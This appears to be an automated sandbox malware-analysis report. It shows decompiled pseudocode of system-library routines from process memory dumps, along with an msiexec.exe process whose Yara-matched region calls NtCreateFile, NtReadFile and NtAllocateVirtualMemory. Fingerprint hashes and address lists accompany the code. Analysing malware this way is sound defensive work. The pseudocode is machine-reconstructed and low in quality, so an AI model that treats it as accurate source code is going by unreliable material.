																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E1E21E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E1E21E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E1E21E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E1E16FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E1E21E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                          0x1e21e833
                          0x1e21e839
                          0x1e21e83e
                          0x1e21e841
                          0x1e21e848
                          0x1e21e84b
                          0x1e21e851
                          0x1e21e8b2
                          0x1e21e8b2
                          0x1e21e8b5
                          0x1e21e90b
                          0x1e21e911
                          0x1e21e913
                          0x1e21e913
                          0x1e21e91a
                          0x1e21e91d
                          0x1e21e922
                          0x1e21e924
                          0x1e21e924
                          0x1e21e924
                          0x1e21e92f
                          0x1e21e933
                          0x1e21e935
                          0x1e21e93a
                          0x1e21e940
                          0x1e21e948
                          0x1e21e950
                          0x1e21e955
                          0x00000000
                          0x00000000
                          0x1e21e957
                          0x1e21e95c
                          0x1e21e9cb
                          0x1e21e9d2
                          0x1e21e9d4
                          0x1e21e9f2
                          0x1e21e9f6
                          0x1e21ea10
                          0x1e21ea18
                          0x1e21ea1a
                          0x1e21ea1f
                          0x1e21ea2c
                          0x1e21ea2d
                          0x1e21ea2e
                          0x1e21ea32
                          0x1e21ea3d
                          0x1e21ea42
                          0x1e21ea45
                          0x1e21ea51
                          0x1e21ea60
                          0x1e21ea65
                          0x1e21ea68
                          0x1e21ea6a
                          0x1e21ea6a
                          0x1e21ea6a
                          0x1e21ea6f
                          0x1e21ea76
                          0x1e21ea7c
                          0x1e21ea7e
                          0x1e21ea81
                          0x1e21ea85
                          0x1e21ea88
                          0x1e21ea8c
                          0x1e21ea8f
                          0x1e21ea93
                          0x1e21ea98
                          0x00000000
                          0x00000000
                          0x1e21ea9a
                          0x1e21ea9d
                          0x1e21eaa2
                          0x1e21eb0e
                          0x1e21eb15
                          0x1e21eb17
                          0x1e21eb33
                          0x1e21eb36
                          0x1e21eb39
                          0x1e21eb3f
                          0x1e21eb45
                          0x1e21eb4a
                          0x1e21eb52
                          0x1e21ecb1
                          0x1e21ecb9
                          0x1e21ecbe
                          0x1e21ecc3
                          0x1e21ecc6
                          0x1e21eceb
                          0x1e21ecee
                          0x1e21ecf9
                          0x1e21ecfe
                          0x1e21ed00
                          0x1e21ed05
                          0x1e21ed07
                          0x1e21ed0a
                          0x1e21ed0c
                          0x1e21ed0e
                          0x1e21ed12
                          0x1e21ed19
                          0x1e21ed1e
                          0x1e21ed24
                          0x1e21ed2a
                          0x1e21ed2a
                          0x1e21ed2c
                          0x1e21ed3e
                          0x1e21ed3e
                          0x1e21eb5a
                          0x1e21eb62
                          0x1e21eb69
                          0x00000000
                          0x00000000
                          0x1e21eb6f
                          0x1e21eb75
                          0x1e21eb79
                          0x1e21eb79
                          0x1e21eb88
                          0x1e21eb8e
                          0x1e21eb90
                          0x1e21eb92
                          0x1e21eb97
                          0x1e21ed3f
                          0x1e21ed45
                          0x00000000
                          0x00000000
                          0x1e21ed4b
                          0x1e21ed4e
                          0x00000000
                          0x1e21eb9d
                          0x1e21eb9d
                          0x1e21eb9d
                          0x1e21eba2
                          0x1e21ebb5
                          0x1e21ebbc
                          0x1e21ebbe
                          0x1e21ebbe
                          0x1e21ebc3
                          0x1e21ebc5
                          0x1e21ebcb
                          0x1e21ebd2
                          0x1e21ebd5
                          0x1e21ebdb
                          0x1e21ebdf
                          0x1e21ebe1
                          0x1e21ebf0
                          0x1e21ebf9
                          0x1e21ec04
                          0x1e21ec07
                          0x1e21ec0a
                          0x1e21ec82
                          0x1e21ec85
                          0x1e21ec8b
                          0x1e21ec91
                          0x1e21ec93
                          0x1e21ec96
                          0x1e21ec9b
                          0x1e21eca6
                          0x1e21ecac
                          0x1e21ecae
                          0x1e21ecae
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x1e21ec0c
                          0x1e21ec0c
                          0x1e21ec0c
                          0x1e21ec0f
                          0x1e21ec12
                          0x1e21ec15
                          0x1e21ec15
                          0x1e21ec18
                          0x1e21ec1e
                          0x00000000
                          0x00000000
                          0x1e21ec22
                          0x1e21ec28
                          0x1e21ec4b
                          0x1e21ec5b
                          0x1e21ec5d
                          0x1e21ec63
                          0x1e21ec65
                          0x1e21ec68
                          0x1e21ec6b
                          0x1e21ec6b
                          0x1e21ec70
                          0x1e21ec71
                          0x1e21ec74
                          0x1e21ec7d
                          0x00000000
                          0x1e21ebe3
                          0x1e21ebe3
                          0x1e21ebe6
                          0x1e21ebe6
                          0x1e21ebe7
                          0x1e21ebe9
                          0x1e21ebec
                          0x00000000
                          0x1e21ebe6
                          0x1e21ebe1
                          0x1e21eba4
                          0x1e21eba9
                          0x1e21ebb0
                          0x1e21ebb3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x1e21ebab
                          0x1e21ebab
                          0x1e21ebab
                          0x1e21ebac
                          0x1e21ebac
                          0x00000000
                          0x1e21ebab
                          0x1e21eb97
                          0x1e21eb19
                          0x1e21eb1c
                          0x1e21eb21
                          0x1e21eb26
                          0x1e21eb2c
                          0x1e21eb2c
                          0x00000000
                          0x1e21eb26
                          0x1e21ead6
                          0x1e21ead9
                          0x1e21eadc
                          0x1e21eadc
                          0x1e21eadc
                          0x1e21eade
                          0x1e21eae4
                          0x00000000
                          0x00000000
                          0x1e21eaee
                          0x1e21eaf7
                          0x1e21eaf9
                          0x00000000
                          0x00000000
                          0x1e21eb04
                          0x1e21eb12
                          0x00000000
                          0x1e21eb12
                          0x1e21eb06
                          0x00000000
                          0x1e21eb06
                          0x1e21eaf0
                          0x1e21eaf2
                          0x1e21eaf4
                          0x00000000
                          0x1e21eaf4
                          0x1e21ea6a
                          0x1e21ea21
                          0x00000000
                          0x1e21ea21
                          0x1e21e9d6
                          0x1e21e9d6
                          0x1e21e9e0
                          0x1e21e9e2
                          0x1e21e9e2
                          0x1e21e9e8
                          0x00000000
                          0x1e21e9e8
                          0x1e21e987
                          0x1e21e98f
                          0x1e21e992
                          0x1e21e995
                          0x1e21e995
                          0x1e21e998
                          0x1e21e998
                          0x1e21e99a
                          0x1e21e9a0
                          0x00000000
                          0x00000000
                          0x1e21e9a9
                          0x1e21e9b2
                          0x1e21e9b4
                          0x00000000
                          0x00000000
                          0x1e21e9ba
                          0x1e21e9c1
                          0x1e21e9cf
                          0x00000000
                          0x1e21e9cf
                          0x1e21e9c3
                          0x00000000
                          0x1e21e9c3
                          0x1e21e9ab
                          0x1e21e9ad
                          0x1e21e9af
                          0x00000000
                          0x1e21e9af
                          0x1e21e924
                          0x1e21e8b7
                          0x1e21e8ba
                          0x1e21e902
                          0x1e21e908
                          0x1e21e90a
                          0x00000000
                          0x1e21e90a
                          0x1e21e8bc
                          0x1e21e8bf
                          0x1e21e8f9
                          0x1e21e8ff
                          0x1e21e901
                          0x00000000
                          0x1e21e901
                          0x1e21e8c1
                          0x1e21e8c4
                          0x1e21e8f0
                          0x1e21e8f6
                          0x1e21e8f8
                          0x00000000
                          0x1e21e8f8
                          0x1e21e8c6
                          0x1e21e8c9
                          0x1e21e8e7
                          0x1e21e8ed
                          0x1e21e8ef
                          0x00000000
                          0x1e21e8ef
                          0x1e21e8cb
                          0x1e21e8ce
                          0x1e21e8de
                          0x1e21e8e4
                          0x1e21e8e6
                          0x00000000
                          0x1e21e8e6
                          0x1e21e8d3
                          0x00000000
                          0x1e21e8d5
                          0x1e21e8db
                          0x1e21e8dd
                          0x00000000
                          0x1e21e8dd
                          0x1e21e853
                          0x1e21e855
                          0x1e21e85b
                          0x1e21e85d
                          0x1e21e897
                          0x1e21e89c
                          0x1e21e8a2
                          0x1e21e8a6
                          0x1e21e8ab
                          0x1e21e8ad
                          0x1e21e8ad
                          0x00000000
                          0x1e21e85d

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: 2b8103f1e45fedd5424b32e9a7b563de51682323e24b333ab34eb8dd4471f5db
                          • Instruction ID: d4e926d0d85c9ee175136190505cbfcd4734fc9d4bb85cc6170c18b27197e3cf
                          • Opcode Fuzzy Hash: 2b8103f1e45fedd5424b32e9a7b563de51682323e24b333ab34eb8dd4471f5db
                          • Instruction Fuzzy Hash: DF02A472E006168BCB18CFA9CCE167EBBF6BF88200765466DE456DB381D734EA41CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E17645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 26%
                          			E1E17645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e23d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E18FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E162280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E15FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e23b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E18B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                          0x1e17645b
                          0x1e176463
                          0x1e17646d
                          0x1e176475
                          0x1e17647a
                          0x1e17647e
                          0x1e176480
                          0x1e17648c
                          0x1e176490
                          0x1e176495
                          0x1e176498
                          0x1e17649b
                          0x1e17649f
                          0x1e1764a1
                          0x1e1b7c07
                          0x1e1b7c09
                          0x1e1b7c0c
                          0x00000000
                          0x1e1764a7
                          0x1e1764a7
                          0x1e1764aa
                          0x1e1b7bf7
                          0x1e1b7c00
                          0x00000000
                          0x1e1b7bf9
                          0x1e1b7bf9
                          0x1e1b7bf9
                          0x1e1764b0
                          0x1e1764b0
                          0x1e1764b2
                          0x1e1764b2
                          0x1e1764b3
                          0x1e1764ba
                          0x1e176553
                          0x1e17655e
                          0x1e176566
                          0x1e17656c
                          0x1e176575
                          0x1e17657f
                          0x1e176585
                          0x1e176588
                          0x1e176588
                          0x1e1764c7
                          0x1e1764cb
                          0x1e1764ce
                          0x1e1764d3
                          0x1e1764da
                          0x1e1764e5
                          0x1e1764ed
                          0x1e1764f1
                          0x1e1764f5
                          0x1e1764f6
                          0x1e1764fa
                          0x1e176502
                          0x1e176503
                          0x1e176504
                          0x1e176507
                          0x1e17651a
                          0x1e176524
                          0x1e176524
                          0x1e176526
                          0x1e176526
                          0x1e1764aa
                          0x1e17652c
                          0x1e17652d
                          0x1e17652e
                          0x1e176539

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: 0$0
                          • API String ID: 3446177414-203156872
                          • Opcode ID: c260afe713c2270187f3d2ce974bc9e83b1d795b7664609e1039bb70c606080d
                          • Instruction ID: b47bd499decef92a957bb0505a6b6976f13bc40ee20e98af7d2c8143d727f44b
                          • Opcode Fuzzy Hash: c260afe713c2270187f3d2ce974bc9e83b1d795b7664609e1039bb70c606080d
                          • Instruction Fuzzy Hash: 04416DB1A087469FC300CF28C584A56BBE5BB8D714F144A2EF489DB301D771EA85CF96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E1E1DFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E18CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E1D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E1D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                          0x1e1dfdda
                          0x1e1dfde2
                          0x1e1dfde5
                          0x1e1dfdec
                          0x1e1dfdfa
                          0x1e1dfdff
                          0x1e1dfe0a
                          0x1e1dfe0f
                          0x1e1dfe17
                          0x1e1dfe1e
                          0x1e1dfe19
                          0x1e1dfe19
                          0x1e1dfe19
                          0x1e1dfe20
                          0x1e1dfe21
                          0x1e1dfe22
                          0x1e1dfe25
                          0x1e1dfe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E1DFDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E1DFE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E1DFE2B
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: aeb6b97bf4973ea757f7249c517894b544dd6edf168eb9844b0821b00a929c22
                          • Instruction ID: 947a8d01e2cff3d7590ba6488eb3c1d1bc525920ab676a64f1434b983f8a3aed
                          • Opcode Fuzzy Hash: aeb6b97bf4973ea757f7249c517894b544dd6edf168eb9844b0821b00a929c22
                          • Instruction Fuzzy Hash: C1F0F036600241BFEA205A45DC45FA3BF6EFB44B71F254314F628562E1EA62F9A0C6F0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: msiexec.exe PID: 6680 Parent PID: 3424 msiexec.exeCOMMON

                          Executed Functions

                          Function 01119D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction ID: 9dc3549bfe3a8268fc6e2b43ffc682382b14ceb76651bd8f7d415a04a2736b4f
                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                          • Instruction Fuzzy Hash: 49F0BDB2201208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97240D630E8518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                          • Instruction ID: f41519945518ab3bb34ca3868135f217c9888e37ad5620f400a95dc3c3dbb446
                          • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                          • Instruction Fuzzy Hash: 5CF0B6B220514AABCB08DF98DD85CDBB7ADBF8C254B05864DFA5D93201D630E8518BA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119DA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateFile.NTDLL(00000060,00000000,.z`,01114B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01114B77,007A002E,00000000,00000060,00000000,00000000), ref: 01119D9D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: CreateFile
                          • String ID: .z`
                          • API String ID: 823142352-1441809116
                          • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                          • Instruction ID: 7217eea88e7ae42794a0f556a3e403d328c7f43fdd383a844c5c227652499dcb
                          • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                          • Instruction Fuzzy Hash: 51F0BCB2204009AF8B08CF88D890CEB73F9BF8C308B118608FA4D93201C630E851CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(01114D32,5EB6522D,FFFFFFFF,011149F1,?,?,01114D32,?,011149F1,FFFFFFFF,5EB6522D,01114D32,?,00000000), ref: 01119E45
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction ID: 80f3d3a4fd755cc37fefb65e72663d88ca426d90c729a737a25909e99e77db8c
                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                          • Instruction Fuzzy Hash: 41F017B2200208AFCB08DF89DC80EEB77ADEF8C714F018248BE1D97240D630E811CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119DFE, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtReadFile.NTDLL(01114D32,5EB6522D,FFFFFFFF,011149F1,?,?,01114D32,?,011149F1,FFFFFFFF,5EB6522D,01114D32,?,00000000), ref: 01119E45
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                          • Instruction ID: 44a78a00dc6e2e49b1bb4b35af3f367e1bb0085cf5abae8ca833b1b407c5001d
                          • Opcode Fuzzy Hash: 06d8c114a73e8788155844279abf97e391ef936e158bdf3e01102b5bdcd53d6e
                          • Instruction Fuzzy Hash: 54F0A9B6200109AFCB14DF89DC90DEB77A9AF8C354F168649BA5DA7250D630E8518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01102D11,00002000,00003000,00000004), ref: 01119F69
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                          • Instruction ID: ff97003ffad565e3251666f9b9e49561754a8c450f5b04c6e85d63d9cec63d6a
                          • Opcode Fuzzy Hash: 784c957765819ddfb962bf8d62287b0d1054649d66780c930414214927f2c729
                          • Instruction Fuzzy Hash: F0F058B2210218AFCB18DF88DC91EEB77ADAF88210F158219FA1C97240D630E910CBE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01102D11,00002000,00003000,00000004), ref: 01119F69
                          Memory Dump Source
                          • Source File: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, Offset: 01100000, based on PE: false
                          Yara matches
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 2167126740-0
                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction ID: e3b220a255645e34c3b7dc64ac04f6bd7c5960cd24f7c6fd65b8bf4237a3a924
                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                          • Instruction Fuzzy Hash: ADF015B6200209AFCB18DF89DC81EAB77ADAF88654F118159BE5897241C630F810CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01119E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
